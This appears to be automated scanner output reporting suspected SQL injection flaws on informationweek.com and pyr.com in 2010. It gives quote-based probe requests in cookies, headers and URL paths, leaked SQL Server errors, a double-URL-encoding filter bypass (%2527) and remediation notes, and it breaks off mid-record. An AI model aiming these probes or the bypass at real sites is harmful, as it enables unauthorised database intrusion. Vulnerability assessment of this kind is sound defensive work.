GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:57 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:57 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:58 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:58 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:50 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:50 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_lv_s cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%2527;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:20 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:20 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%2527%2527;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:21 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:21 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62931
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:51 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:51 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30461
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527%2527 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:23:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527%2527&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days; Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:23:10 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:10 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62489
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days; Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:23:11 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:11 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:23:06 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:06 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:23:08 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:08 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /pr_prlist'/PR120910_IPTV.htm HTTP/1.1 Host: www.pyr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:09:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /pr_prlist''/PR120910_IPTV.htm HTTP/1.1 Host: www.pyr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:09:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/rp_Can-Vod-Save-IPTV.htm HTTP/1.1 Host: www.pyr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:08:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 343 Content-Type: text/html Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near the keyword 'Save'.</font> ...[SNIP]...
Request 2
GET /store''/rp_Can-Vod-Save-IPTV.htm HTTP/1.1 Host: www.pyr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:08:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/rp_Global-Mobile-Capex-Index.htm HTTP/1.1 Host: www.pyr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:09:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 344 Content-Type: text/html Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near the keyword 'Index'.</font> ...[SNIP]...
Request 2
GET /store''/rp_Global-Mobile-Capex-Index.htm HTTP/1.1 Host: www.pyr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:09:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
